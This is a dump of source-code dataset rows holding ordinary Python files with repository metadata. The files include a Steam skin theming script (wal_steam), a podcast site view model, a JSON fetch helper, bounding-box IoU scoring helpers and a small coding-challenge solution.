        if error_while_importing is not None:
            # Bug fix: the original formatted ``type(e).__name__`` but ``e``
            # is not in scope here -- an except-clause name is cleared when
            # the handler exits in Python 3, so the fail() itself raised
            # a NameError.
            self.fail("%s: %s" % (type(error_while_importing).__name__,
                                  error_while_importing))
self.fail("%s: %s" % (type(e).__name__, error_while_importing)) | 0 | 0 | 0 |
17f0d3a778365e7cf4affd00494092615fedf153 | 102 | py | Python | arcade/intro/d. 36. different-symbols-naive/different_symbols_naive.py | jeury301/code-fights | 379dd541aed0f3918cf1659b635ec51368b0b349 | [
"MIT"
] | null | null | null | arcade/intro/d. 36. different-symbols-naive/different_symbols_naive.py | jeury301/code-fights | 379dd541aed0f3918cf1659b635ec51368b0b349 | [
"MIT"
] | null | null | null | arcade/intro/d. 36. different-symbols-naive/different_symbols_naive.py | jeury301/code-fights | 379dd541aed0f3918cf1659b635ec51368b0b349 | [
"MIT"
] | null | null | null | from collections import Counter
| 25.5 | 39 | 0.764706 | from collections import Counter
def differentSymbolsNaive(s):
    """Count the number of distinct characters in ``s``."""
    return len(set(s))
| 48 | 0 | 22 |
1089085b26dac1cefaeed0f7ba6549de5f2202fb | 2,107 | py | Python | viewmodels/home/indexviewmodel.py | prcutler/circuitpythonshow | 9e6ecf416cd8c9fe4625fb9ebac2f5688f73ade7 | [
"MIT"
] | 3 | 2022-01-11T04:06:38.000Z | 2022-02-21T13:12:20.000Z | viewmodels/home/indexviewmodel.py | prcutler/circuitpythonshow | 9e6ecf416cd8c9fe4625fb9ebac2f5688f73ade7 | [
"MIT"
] | 8 | 2022-01-22T16:51:46.000Z | 2022-03-31T15:34:11.000Z | viewmodels/home/indexviewmodel.py | prcutler/circuitpythonshow | 9e6ecf416cd8c9fe4625fb9ebac2f5688f73ade7 | [
"MIT"
] | 1 | 2022-01-14T15:24:48.000Z | 2022-01-14T15:24:48.000Z | from starlette.requests import Request
from typing import List, Optional
from viewmodels.shared.viewmodel import ViewModelBase
from services import episode_service
from data.episode import Episode
| 33.983871 | 95 | 0.687708 | from starlette.requests import Request
from typing import List, Optional
from viewmodels.shared.viewmodel import ViewModelBase
from services import episode_service
from data.episode import Episode
class IndexViewModel(ViewModelBase):
    """View model for the home page: the latest episode plus the previous one."""

    def __init__(self, request: Request):
        super().__init__(request)
        self.episodes: List[Episode] = []
        self.episode_count: int = 0
        self.episode_number: int = 0
        self.guest_firstname: str = ""
        self.guest_lastname: str = ""
        self.topic: str = ""
        self.publish_date: str = ""
        self.old_episode_number: Optional[int] = None
        self.old_publish_date: Optional[str] = None
        self.old_episode: List[Episode] = []

    async def load(self):
        """Fetch the latest episode and, when one exists, its predecessor.

        Bug fix: the original fetched both the current and the previous
        episode data twice -- once with an unguarded
        ``episode_number - 1`` that could reach 0 -- and left a stray
        debug print behind.
        """
        self.episode_number = await episode_service.get_last_episode_number()
        self.episodes = await episode_service.get_episode_info(self.episode_number)
        self.publish_date = await episode_service.get_publish_date(self.episode_number)

        # Episode 1 has no predecessor; fall back to itself.
        if self.episode_number > 1:
            self.old_episode_number = self.episode_number - 1
        else:
            self.old_episode_number = self.episode_number
        self.old_episode = await episode_service.get_episode_info(
            self.old_episode_number
        )
        self.old_publish_date = await episode_service.get_publish_date(
            self.old_episode_number
        )
| 1,815 | 15 | 76 |
4a957084737ee6e07aec48c0b2028bfbead767f9 | 16,779 | py | Python | wal_steam.py | thereal-S/wal_steam | 0524c0fe5c392b8784d68a692153da8155bd0cd2 | [
"MIT"
] | 177 | 2017-08-18T10:22:21.000Z | 2022-03-06T23:20:12.000Z | wal_steam.py | thereal-S/wal_steam | 0524c0fe5c392b8784d68a692153da8155bd0cd2 | [
"MIT"
] | 77 | 2017-08-18T00:40:15.000Z | 2022-02-11T18:52:10.000Z | wal_steam.py | thereal-S/wal_steam | 0524c0fe5c392b8784d68a692153da8155bd0cd2 | [
"MIT"
] | 36 | 2017-08-23T02:34:14.000Z | 2022-01-03T13:12:02.000Z | #!/usr/bin/env python3
"""
Wal Steam
========================================
oooo oooo .
`888 .8P' .o8
888 d8' .ooooo. .o888oo .oooo.
88888[ d88' `88b 888 `P )88b
888`88b. 888 888 888 .oP"888
888 `88b. 888 888 888 . d8( 888
o888o o888o `Y8bod8P' "888" `Y888""8o
@nilsu.org
=== Copyright (C) 2019 Dakota Walsh ===
"""
import shutil # copying files
import os # getting paths
import urllib.request # downloading the zip files
import zipfile # extracting the zip files
import sys
import argparse # argument parsing
import textwrap
import time
import re
from distutils.dir_util import copy_tree # copytree from shutil is broken so use copy_tree
from argparse import RawTextHelpFormatter
# set some variables for the file locations
HOME_DIR = os.getenv("HOME", os.getenv("USERPROFILE")) # should be crossplatform
CACHE_DIR = os.path.join(HOME_DIR, ".cache", "wal_steam")
CONFIG_DIR = os.path.join(HOME_DIR, ".config", "wal_steam")
SKIN_VERSION = "4.4"
SKIN_NAME = "Metro %s Wal_Mod" % SKIN_VERSION
VERSION = "1.4"
CONFIG_FILE = "wal_steam.conf"
COLORS_FILE = os.path.join(CACHE_DIR, "custom.styles")
CONFIG_URL = "https://raw.githubusercontent.com/kotajacob/wal_steam_config/master/wal_steam.conf"
STEAM_DIR_OTHER = os.path.expanduser("~/.steam/steam/skins")
STEAM_DIR_OSX = os.path.expanduser("~/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/skins")
STEAM_DIR_UBUNTU = os.path.expanduser("~/.steam/skins")
STEAM_DIR_WINDOWS = "C:\Program Files (x86)\Steam\skins"
WAL_COLORS = os.path.join(HOME_DIR, ".cache", "wal", "colors.css")
WPG_COLORS = os.path.join(HOME_DIR, ".config", "wpg", "formats", "colors.css")
METRO_URL = "https://github.com/minischetti/metro-for-steam/archive/v%s.zip" % SKIN_VERSION
METRO_ZIP = os.path.join(CACHE_DIR, "metroZip.zip")
METRO_DIR = os.path.join(CACHE_DIR, "metro-for-steam-%s" % SKIN_VERSION)
METRO_COLORS_FILE = os.path.join(METRO_DIR, "custom.styles")
METRO_PATCH_URL = "https://github.com/redsigma/UPMetroSkin/archive/9.1.12.zip" # A link to the version we've tested rather than the latest, just in case they break things upstream.
METRO_PATCH_ZIP = os.path.join(CACHE_DIR, "metroPatchZip.zip")
METRO_PATCH_DIR = os.path.join(CACHE_DIR, "metroPatchZip")
METRO_PATCH_COPY = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Main Files [Install First]")
METRO_PATCH_HDPI = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Extras", "High DPI", "Increased fonts", "Install")
MAX_PATCH_DL_ATTEMPTS = 5
# CLI colour and style sequences
CLI_RED = "\033[91m"
CLI_YELLOW = "\033[93m"
CLI_BOLD = "\033[1m"
CLI_END = "\033[0m"
###################
# color functions #
###################
def hexToRgb(hexColors):
"""Convert hex colors to rgb colors (takes a list)."""
return [tuple(bytes.fromhex(color.strip("#"))) for color in hexColors]
##########################
# checkInstall functions #
##########################
if __name__ == '__main__':
main()
| 33.491018 | 181 | 0.630312 | #!/usr/bin/env python3
"""
Wal Steam
========================================
oooo oooo .
`888 .8P' .o8
888 d8' .ooooo. .o888oo .oooo.
88888[ d88' `88b 888 `P )88b
888`88b. 888 888 888 .oP"888
888 `88b. 888 888 888 . d8( 888
o888o o888o `Y8bod8P' "888" `Y888""8o
@nilsu.org
=== Copyright (C) 2019 Dakota Walsh ===
"""
import shutil # copying files
import os # getting paths
import urllib.request # downloading the zip files
import zipfile # extracting the zip files
import sys
import argparse # argument parsing
import textwrap
import time
import re
from distutils.dir_util import copy_tree # copytree from shutil is broken so use copy_tree
from argparse import RawTextHelpFormatter
# set some variables for the file locations
HOME_DIR = os.getenv("HOME", os.getenv("USERPROFILE")) # should be crossplatform
CACHE_DIR = os.path.join(HOME_DIR, ".cache", "wal_steam")
CONFIG_DIR = os.path.join(HOME_DIR, ".config", "wal_steam")
SKIN_VERSION = "4.4"
SKIN_NAME = "Metro %s Wal_Mod" % SKIN_VERSION
VERSION = "1.4"
CONFIG_FILE = "wal_steam.conf"
COLORS_FILE = os.path.join(CACHE_DIR, "custom.styles")
CONFIG_URL = "https://raw.githubusercontent.com/kotajacob/wal_steam_config/master/wal_steam.conf"
STEAM_DIR_OTHER = os.path.expanduser("~/.steam/steam/skins")
STEAM_DIR_OSX = os.path.expanduser("~/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/skins")
STEAM_DIR_UBUNTU = os.path.expanduser("~/.steam/skins")
STEAM_DIR_WINDOWS = "C:\Program Files (x86)\Steam\skins"
WAL_COLORS = os.path.join(HOME_DIR, ".cache", "wal", "colors.css")
WPG_COLORS = os.path.join(HOME_DIR, ".config", "wpg", "formats", "colors.css")
METRO_URL = "https://github.com/minischetti/metro-for-steam/archive/v%s.zip" % SKIN_VERSION
METRO_ZIP = os.path.join(CACHE_DIR, "metroZip.zip")
METRO_DIR = os.path.join(CACHE_DIR, "metro-for-steam-%s" % SKIN_VERSION)
METRO_COLORS_FILE = os.path.join(METRO_DIR, "custom.styles")
METRO_PATCH_URL = "https://github.com/redsigma/UPMetroSkin/archive/9.1.12.zip" # A link to the version we've tested rather than the latest, just in case they break things upstream.
METRO_PATCH_ZIP = os.path.join(CACHE_DIR, "metroPatchZip.zip")
METRO_PATCH_DIR = os.path.join(CACHE_DIR, "metroPatchZip")
METRO_PATCH_COPY = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Main Files [Install First]")
METRO_PATCH_HDPI = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Extras", "High DPI", "Increased fonts", "Install")
MAX_PATCH_DL_ATTEMPTS = 5
# CLI colour and style sequences
CLI_RED = "\033[91m"
CLI_YELLOW = "\033[93m"
CLI_BOLD = "\033[1m"
CLI_END = "\033[0m"
def tupToPrint(tup):
    """Join a tuple of values into a space-separated string (e.g. an RGB triple)."""
    return " ".join(str(part) for part in tup)
def setCustomStyles(colors, variables, walColors, alpha, steam_dir, fonts = []):
    """Write a patched custom.styles into the installed skin.

    colors     -- list of RGB tuples (indexed by the entries of walColors)
    variables  -- skin variable names to patch, parallel to walColors/alpha
    walColors  -- per-variable color index into ``colors``
    alpha      -- per-variable alpha value appended after the RGB triple
    steam_dir  -- steam skins directory receiving the file
    fonts      -- optional font overrides passed to replaceFonts
                  (NOTE(review): mutable default, but only read here)
    """
    print ("Patching new colors")
    # delete the old colors file if present in cache
    try:
        os.remove(COLORS_FILE) # just in case it was already there for some reason
    except FileNotFoundError:
        print("No file to remove")
    with open(METRO_COLORS_FILE) as f:
        custom_styles = f.read()

    # Build one 'name="r g b a"' line per skin variable.
    patches = []
    ii = 0
    for ii, i in enumerate(variables):
        patches.append(
            '{}="{} {}"'.format(i, tupToPrint(colors[int(walColors[ii])]), alpha[ii])
        )
    wal_styles = "\n".join(patches)
    # Insert the generated lines just before the closing brace that
    # precedes the "styles{" section.
    custom_styles = custom_styles.replace(
        "}\n\nstyles{", wal_styles + "}\n\nstyles{")
    if fonts:
        custom_styles = replaceFonts(custom_styles, fonts)
    with open(COLORS_FILE, "w") as f:
        f.write(custom_styles)
    # now copy it to the proper place based on the os
    shutil.copy(COLORS_FILE, os.path.join(steam_dir, SKIN_NAME))
    # cleanup by removing generated color files
    os.remove(COLORS_FILE)
    print(
        "Wal colors are now patched and ready to go\n"
        "If this is your first run you may have to\n"
        "enable Metro Wal Mod skin in steam then\n"
        "simply restart steam!"
    )
def replaceFonts(styles, fonts):
    """Substitute the four font declarations inside a custom.styles string.

    ``fonts`` supplies, in order: basefont, semibold, semilight, light.
    """
    print("Patching custom fonts")
    # Each font key is matched at the start of a line (MULTILINE mode).
    for index, key in enumerate(("basefont", "semibold", "semilight", "light")):
        pattern = "^" + key + "=\"(.+?)\""
        replacement = key + "=\"" + fonts[index] + "\""
        styles = re.sub(pattern, replacement, styles, 0, re.M)
    return styles
###################
# color functions #
###################
def getConfigAlpha():
    """Read the wal_steam config and return each line's alpha value.

    The alpha is the text between the comma and the end of the line.
    """
    with open(os.path.join(CONFIG_DIR, CONFIG_FILE)) as f:
        rawFile = f.readlines()
    return [line[line.find(",") + 1:line.find("\n")] for line in rawFile]
def getConfigColor():
    """Read the wal_steam config and return each line's color index.

    The color index is the text between '=' and the comma.
    """
    with open(os.path.join(CONFIG_DIR, CONFIG_FILE)) as f:
        rawFile = f.readlines()
    return [line[line.find("=") + 1:line.find(",")] for line in rawFile]
def getConfigVar():
    """Read the wal_steam config and return each line's variable name.

    The variable name is everything before the '='.
    """
    with open(os.path.join(CONFIG_DIR, CONFIG_FILE)) as f:
        rawFile = f.readlines()
    return [line[:line.find("=")] for line in rawFile]
def hexToRgb(hexColors):
    """Convert a list of '#rrggbb' strings to (r, g, b) integer tuples."""
    rgb = []
    for color in hexColors:
        rgb.append(tuple(bytes.fromhex(color.strip("#"))))
    return rgb
def getColors(mode):
    """Read the terminal colors generated by pywal or wpg.

    mode 0 reads the wal colors file, anything else the wpg file.
    Returns a list of ``#rrggbb`` strings; exits if the file is missing.
    """
    if (mode == 0):
        # using colors from wal
        colorsFile = WAL_COLORS
    else:
        # using colors from wpg
        colorsFile = WPG_COLORS

    # parse the file
    print("Reading colors")
    try:
        with open(colorsFile) as f:
            rawFile = f.readlines()  # save the lines to rawFile
    except OSError:
        # was a bare except, which also swallowed KeyboardInterrupt and
        # SystemExit; only file-access errors are expected here
        print("Error: Colors file missing. Make sure you've run pywal/wpg before wal_steam")
        sys.exit(1)

    # delete the lines not involving the colors
    del rawFile[0:11]
    del rawFile[16]

    # keep only the "#rrggbb" hex code of each remaining line
    colors = []
    for line in rawFile:
        tmp = line[line.find("#"):]
        tmp = tmp[:7]
        colors.append(tmp)
    return colors
##########################
# checkInstall functions #
##########################
def checkSkin(steam_dir, dpi):
    """Make sure the patched Metro skin exists in the cache and in Steam.

    When *dpi* is 1 the skin is re-copied even if already installed so
    that the high-DPI patches take effect.
    """
    # rebuild the cached skin when the skin or its patch is missing
    have_cache = os.path.isdir(METRO_DIR) and os.path.isdir(METRO_PATCH_COPY)
    if not have_cache:
        makeSkin()

    skin_path = os.path.join(steam_dir, SKIN_NAME)
    if not os.path.isdir(skin_path):
        print("Installing skin")
        copy_tree(METRO_DIR, skin_path)
    else:
        print("Wal Steam skin found")
        if (dpi==1):
            print("Forcing skin install for High DPI patches")
            copy_tree(METRO_DIR, skin_path)
def makeSkin():
    """Download Metro for Steam plus its community patch into the cache.

    Retries the patch download up to MAX_PATCH_DL_ATTEMPTS times and
    exits on failure.  The patch is applied over the extracted skin.
    """
    # download metro for steam and extract
    print("Downloading Metro for steam")
    try:
        opener = urllib.request.build_opener()
        # BUG FIX: this was the set literal {'User-Agent', 'Mozilla/5.0'};
        # urllib expects a list of (header, value) tuples
        opener.addheaders = [('User-Agent', 'Mozilla/5.0')]
        urllib.request.install_opener(opener)
        urllib.request.urlretrieve(METRO_URL, METRO_ZIP)
    except OSError:
        # urllib.error.URLError is a subclass of OSError, so this also
        # covers network failures without hiding KeyboardInterrupt
        print("Error: downloading needed skin file. Check your connection and try again.")
        sys.exit(1)

    with zipfile.ZipFile(METRO_ZIP, 'r') as z:
        z.extractall(CACHE_DIR)

    # download metro for steam patch and extract
    print("Attempting to download Metro patch")
    patch_dl_attempts = 0
    patch_dld = False
    while (patch_dl_attempts < MAX_PATCH_DL_ATTEMPTS) and not patch_dld:
        try:
            opener = urllib.request.build_opener()
            urllib.request.install_opener(opener)
            urllib.request.urlretrieve(METRO_PATCH_URL, METRO_PATCH_ZIP)
            patch_dld = True
        except OSError:
            patch_dl_attempts += 1
            print("Error: download attempt " + str(patch_dl_attempts) + " failed.")
            if patch_dl_attempts < MAX_PATCH_DL_ATTEMPTS:
                # give the network a moment before retrying
                time.sleep(5)

    if not patch_dld:
        print("Error: patch download attempts failed, exiting...")
        sys.exit(1)
    else:
        print("Patch downloaded, proceeding...")

    with zipfile.ZipFile(METRO_PATCH_ZIP, 'r') as z:
        z.extractall(METRO_PATCH_DIR)

    # finally apply the patch
    copy_tree(METRO_PATCH_COPY, METRO_DIR)  # use copy_tree not copytree, shutil copytree is broken
def makeConfig():
    """Download the default wal_steam config file; exit on failure."""
    print ("Downloading config file")
    try:
        urllib.request.urlretrieve(CONFIG_URL, os.path.join(CONFIG_DIR, CONFIG_FILE))
    except OSError:
        # urllib.error.URLError subclasses OSError; the old bare except
        # also hid KeyboardInterrupt and SystemExit
        print("Error: downloading needed config file.")
        sys.exit(1)
def makeDpi():
    """Copy the high-DPI patch files over the cached Metro skin."""
    print("Applying the high dpi patches")
    copy_tree(METRO_PATCH_HDPI, METRO_DIR)
def delConfig():
    """Remove the wal_steam config directory, if present."""
    config_exists = os.path.isdir(CONFIG_DIR)
    if config_exists:
        shutil.rmtree(CONFIG_DIR)
def delCache():
    """Remove the wal_steam cache directory, if present."""
    cache_exists = os.path.isdir(CACHE_DIR)
    if cache_exists:
        shutil.rmtree(CACHE_DIR)
def delSkin(steam_dir):
    """Remove the installed skin from the given Steam skins directory."""
    skin_path = os.path.join(steam_dir, SKIN_NAME)
    if os.path.isdir(skin_path):
        shutil.rmtree(skin_path)
def checkConfig():
    """Ensure the wal_steam config directory and config file exist.

    Missing pieces are created/downloaded; otherwise a message notes
    that the config was found.
    """
    dot_config = os.path.join(HOME_DIR, ".config")
    if not os.path.isdir(dot_config):
        os.mkdir(dot_config)

    if not os.path.isdir(CONFIG_DIR):
        # first run: create the directory, then fetch the config file
        os.mkdir(CONFIG_DIR)
        makeConfig()
    elif not os.path.isfile(os.path.join(CONFIG_DIR, CONFIG_FILE)):
        # directory exists but the file itself is missing
        makeConfig()
    else:
        print("Wal Steam config found")
def checkCache(dpi):
    """Ensure the skin cache exists, building it on first run.

    The high-DPI patches are applied whenever *dpi* is 1; that check
    was previously duplicated in both branches and is now done once.
    """
    if not os.path.isdir(os.path.join(HOME_DIR, ".cache")):
        # make the .cache folder
        os.mkdir(os.path.join(HOME_DIR, ".cache"))

    if not os.path.isdir(CACHE_DIR):
        # make the cache directory and populate it with the skin
        os.mkdir(CACHE_DIR)
        makeSkin()
    else:
        print("Wal Steam cache found")

    # apply the dpi patches (runs after either branch, as before)
    if (dpi==1):
        makeDpi()
def checkInstall(oSys, dpi):
    """Run all first-time setup checks: cache, config file, and skin."""
    checkCache(dpi)       # build the cache if it is missing
    checkConfig()         # fetch the config file if it is missing
    checkSkin(oSys, dpi)  # install the skin into steam if it is missing
def forceUpdate(oSys, dpi):
    """Throw away the cache, config and installed skin, then rebuild."""
    # wipe everything first ...
    delConfig()
    delCache()
    delSkin(oSys)
    # ... then re-create the cache and config from scratch
    checkCache(dpi)
    checkConfig()
def getOs():
    """Return the first Steam skins directory found on this system.

    Checks the common Linux, Ubuntu, Windows and macOS locations, in
    that order, and exits with an error when none is present.
    """
    candidates = (
        STEAM_DIR_OTHER,    # ~/.steam/steam/skins - common linux location
        STEAM_DIR_UBUNTU,   # ~/.steam/skins - ubuntu and derivatives
        STEAM_DIR_WINDOWS,  # C:\Program Files (x86)\Steam\skins
        STEAM_DIR_OSX,
    )
    for path in candidates:
        if os.path.isdir(path):
            return path
    print("Error: Steam install not found!")
    sys.exit(1)
def parseFontArgs(rawArgs):
    """Split a comma separated font list into exactly four style names.

    Exits with an error unless the user supplied all four styles.
    """
    styles = [piece.strip() for piece in rawArgs.split(",")]
    if len(styles) == 4:
        return styles
    print("Error: You must specify all four custom font styles.")
    sys.exit(1)
def getArgs():
    """Build the wal_steam argparse parser and parse sys.argv.

    Returns the parsed argparse.Namespace.  RawTextHelpFormatter is used
    so the multi-line --fonts help text renders exactly as written.
    """
    # get the arguments with argparse
    description = "Wal Steam"
    arg = argparse.ArgumentParser(description=description, formatter_class=RawTextHelpFormatter)
    arg.add_argument("-v", "--version", action="store_true",
                     help="Print wal_steam version.")
    arg.add_argument("-w", action="store_true",
                     help="Get colors from wal.")
    arg.add_argument("-g", action="store_true",
                     help="Get colors from wpg.")
    arg.add_argument("-s",
                     help="Enter a custom steam skin directory.")
    arg.add_argument("-d", action="store_true",
                     help="Apply high dpi patches.")
    # CLI_* constants are ANSI color escape codes defined at module level
    arg.add_argument("-u", action="store_true",
                     help=f"Force update cache, skin, and config file. {CLI_RED}WARNING:{CLI_END} WILL OVERWRITE config.json")
    arg.add_argument("-f", "--fonts",
                     help=textwrap.dedent(f'''
                Specify custom fonts. Enter font styles separated by comma.
                {CLI_BOLD}Available styles:{CLI_END} basefont, semibold, semilight, light.
                {CLI_YELLOW}Example:{CLI_END} 'Open Sans, Open Sans Semibold, Open Sans Semilight, Open Sans Light'
                {CLI_RED}WARNING:{CLI_END} Fonts must already be installed on your system.'''))
    arg.add_argument("-a", "--attempts", help="Set the number of patch download attempts (DEFAULT=5)")
    return arg.parse_args()
def main():
    """Entry point: parse CLI options and patch the Steam skin."""
    # BUG FIX: MAX_PATCH_DL_ATTEMPTS is a module-level setting consumed
    # by makeSkin(); without this declaration the assignment below
    # created a dead local and the -a flag silently did nothing
    global MAX_PATCH_DL_ATTEMPTS

    # set default mode to wal
    # 0 = wal
    # 1 = wpgtk
    mode = 0

    # parse the arguments
    arguments = getArgs()

    if arguments.version:
        print("Wal Steam", VERSION)
        sys.exit()

    # make sure they didn't select both wal and wpg
    if arguments.w and arguments.g:
        print("Error: You must select wpg or wal")
        sys.exit(1)

    # set the mode for either wal or wpg
    if arguments.w:
        mode = 0
    if arguments.g:
        mode = 1

    # check if user wants high-dpi support
    dpi = 1 if arguments.d else 0

    # allow the user to enter a custom steam install location
    if arguments.s:
        oSys = arguments.s
        print("Using custom skin path: {}".format(arguments.s))
    else:
        # check where the os installed steam
        # ~/.steam/steam/skins - common linux install location
        # ~/.steam/skins - used on ubuntu and its derivatives
        # C:\Program Files (x86)\Steam\skins - used on windows
        oSys = getOs()

    # allow the user to enter custom font styles
    if arguments.fonts:
        fonts = parseFontArgs(arguments.fonts)
        print("Using custom font styles: {}".format(arguments.fonts))
    else:
        fonts = ""

    # update the cache and config then exit
    if arguments.u:
        print("Force updating cache and config")
        # first remove the cache and config
        forceUpdate(oSys, dpi)
        print("Cache and config updated")
        print("Run with -w or -g to apply and re-enable wal_steam")
        sys.exit()

    if arguments.attempts:
        try:
            # only a malformed integer should trigger the fallback,
            # so the old bare except was narrowed to ValueError
            MAX_PATCH_DL_ATTEMPTS = int(arguments.attempts)
        except ValueError:
            print("Error setting maximum patch download attempts, using default (5).")

    # check for the cache, the skin, and get them if needed
    checkInstall(oSys, dpi)

    # get a list from either wal or wpg based on the mode
    colors = getColors(mode)
    # convert our list of colors from hex to rgb
    colors = hexToRgb(colors)

    # get the variables, colors and alphas from the config file
    variables = getConfigVar()
    walColors = getConfigColor()
    alpha = getConfigAlpha()

    # finally create a temp colors.styles and copy it in updating the skin
    setCustomStyles(colors, variables, walColors, alpha, oSys, fonts)
# entry point when executed as a script (no-op when imported)
if __name__ == '__main__':
    main()
| 12,920 | 0 | 505 |
2ccfa7cbd536230e887665371eaf8ff4ae36b4f9 | 200 | py | Python | utils/network.py | buckyroberts/Discord-Python-Framework | 8731e9a01c2e2f83af9882838ad809696fe89e22 | [
"MIT"
] | 10 | 2021-10-04T01:21:51.000Z | 2021-11-17T09:26:17.000Z | utils/network.py | buckyroberts/Discord-Python-Framework | 8731e9a01c2e2f83af9882838ad809696fe89e22 | [
"MIT"
] | 1 | 2021-10-04T01:38:15.000Z | 2021-10-04T01:38:15.000Z | utils/network.py | buckyroberts/Discord-Python-Framework | 8731e9a01c2e2f83af9882838ad809696fe89e22 | [
"MIT"
] | 2 | 2021-11-20T14:41:56.000Z | 2022-02-09T18:49:29.000Z | import requests
def fetch(*, url, headers):
    """Issue an HTTP GET against *url* and decode the JSON body."""
    return requests.get(url, headers=headers).json()
| 18.181818 | 59 | 0.66 | import requests
def fetch(*, url, headers):
    """
    GET *url* with the given headers and return the parsed JSON payload.
    """
    resp = requests.get(url, headers=headers)
    return resp.json()
| 0 | 0 | 0 |
49792b33f19afed9efddc9395343ced3da2f19b6 | 2,942 | py | Python | predict/helper.py | xjh19971/Autodetection | b88a320d23d943d391d90603ae18369d89bc8385 | [
"MIT"
] | 2 | 2020-06-04T20:41:30.000Z | 2021-07-01T21:28:06.000Z | predict/helper.py | xjh19971/Autodetection | b88a320d23d943d391d90603ae18369d89bc8385 | [
"MIT"
] | null | null | null | predict/helper.py | xjh19971/Autodetection | b88a320d23d943d391d90603ae18369d89bc8385 | [
"MIT"
] | null | null | null | import torch
from shapely.geometry import Polygon
| 33.816092 | 108 | 0.646839 | import torch
from shapely.geometry import Polygon
def convert_map_to_lane_map(ego_map, binary_lane):
    """Strip non-lane pixels from a 3-channel ego map.

    A pixel counts as background when its three channels are equal or
    when channel 0 equals 250/255.  With *binary_lane* True a boolean
    lane mask is returned; otherwise the masked map itself.
    """
    r, g, b = ego_map[0, :, :], ego_map[1, :, :], ego_map[2, :, :]
    grayscale = (r == g) * (g == b)
    background = grayscale + (r == 250 / 255)
    if binary_lane:
        return ~background
    return ego_map * (~background.view(1, ego_map.shape[1], ego_map.shape[2]))
def convert_map_to_road_map(ego_map):
    """Return a boolean mask that is True wherever a pixel is not pure white."""
    white = ((ego_map[0, :, :] == 1)
             * (ego_map[1, :, :] == 1)
             * (ego_map[2, :, :] == 1))
    return ~white
def collate_fn(batch):
    """Transpose a batch of samples into per-field tuples (detection-style collate)."""
    transposed = zip(*batch)
    return tuple(transposed)
def draw_box(ax, corners, color):
    """Plot one bounding box outline on *ax* from a 2xN corner tensor.

    Corners are in meters: they are scaled by 10 px/m and shifted by 400
    so the center sits at pixel (400, 400); y is negated because the
    matplotlib y axis points the opposite way.
    """
    # close the polygon: 0 -> 1 -> 3 -> 2 -> back to 0
    outline = torch.stack(
        [corners[:, 0], corners[:, 1], corners[:, 3], corners[:, 2], corners[:, 0]]
    )
    xs = outline.T[0] * 10 + 400
    ys = -outline.T[1] * 10 + 400
    ax.plot(xs, ys, color=color)
def compute_ats_bounding_boxes(boxes1, boxes2):
    """Average threat score between two sets of boxes (2xN corner tensors).

    IoU is only computed for pairs whose axis-aligned extents overlap;
    the threat scores at several IoU thresholds are then combined with
    1/threshold weights.
    """
    num_boxes1 = boxes1.size(0)
    num_boxes2 = boxes2.size(0)

    # axis-aligned extent of every box in each set
    boxes1_max_x = boxes1[:, 0].max(dim=1)[0]
    boxes1_min_x = boxes1[:, 0].min(dim=1)[0]
    boxes1_max_y = boxes1[:, 1].max(dim=1)[0]
    boxes1_min_y = boxes1[:, 1].min(dim=1)[0]

    boxes2_max_x = boxes2[:, 0].max(dim=1)[0]
    boxes2_min_x = boxes2[:, 0].min(dim=1)[0]
    boxes2_max_y = boxes2[:, 1].max(dim=1)[0]
    boxes2_min_y = boxes2[:, 1].min(dim=1)[0]

    # pairwise overlap pre-filter: all four separating-extent conditions
    # must hold before the (expensive) polygon IoU is evaluated
    condition1_matrix = (boxes1_max_x.unsqueeze(1) > boxes2_min_x.unsqueeze(0))
    condition2_matrix = (boxes1_min_x.unsqueeze(1) < boxes2_max_x.unsqueeze(0))
    condition3_matrix = (boxes1_max_y.unsqueeze(1) > boxes2_min_y.unsqueeze(0))
    condition4_matrix = (boxes1_min_y.unsqueeze(1) < boxes2_max_y.unsqueeze(0))
    condition_matrix = condition1_matrix * condition2_matrix * condition3_matrix * condition4_matrix

    iou_matrix = torch.zeros(num_boxes1, num_boxes2)
    for i in range(num_boxes1):
        for j in range(num_boxes2):
            if condition_matrix[i][j]:
                iou_matrix[i][j] = compute_iou(boxes1[i], boxes2[j])

    # best match for every box in set 2
    iou_max = iou_matrix.max(dim=0)[0]

    iou_thresholds = [0.5, 0.6, 0.7, 0.8, 0.9]
    total_threat_score = 0
    total_weight = 0
    for threshold in iou_thresholds:
        # tp = matches above this threshold; threat score = tp / (tp+fp+fn)
        tp = (iou_max > threshold).sum()
        threat_score = tp * 1.0 / (num_boxes1 + num_boxes2 - tp)
        total_threat_score += 1.0 / threshold * threat_score
        total_weight += 1.0 / threshold

    average_threat_score = total_threat_score / total_weight

    return average_threat_score
def compute_ts_road_map(road_map1, road_map2):
    """Threat score (intersection over union) of two binary road maps."""
    intersection = (road_map1 * road_map2).sum()
    union = road_map1.sum() + road_map2.sum() - intersection
    return intersection * 1.0 / union
def compute_iou(box1, box2):
    """Intersection-over-union of two boxes given as 2xN corner tensors."""
    poly_a = Polygon(torch.t(box1)).convex_hull
    poly_b = Polygon(torch.t(box2)).convex_hull
    overlap = poly_a.intersection(poly_b).area
    return overlap / poly_a.union(poly_b).area
| 2,723 | 0 | 161 |
3da24ba73dbb35056c554b2c9b424a1f2befb527 | 1,453 | py | Python | run_scripts/gds_import.py | zhaokai-l/bag | a496368ad8fc92ff0f5bf3bfb4ebaa45c540a104 | [
"Apache-2.0",
"BSD-3-Clause"
] | 32 | 2019-05-16T19:25:00.000Z | 2021-12-07T20:12:13.000Z | run_scripts/gds_import.py | zhaokai-l/bag | a496368ad8fc92ff0f5bf3bfb4ebaa45c540a104 | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2021-01-07T03:08:33.000Z | 2021-01-07T03:08:33.000Z | run_scripts/gds_import.py | zhaokai-l/bag | a496368ad8fc92ff0f5bf3bfb4ebaa45c540a104 | [
"Apache-2.0",
"BSD-3-Clause"
] | 11 | 2019-07-23T17:37:48.000Z | 2021-10-19T15:24:33.000Z | # SPDX-License-Identifier: Apache-2.0
# Copyright 2019 Blue Cheetah Analog Design Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
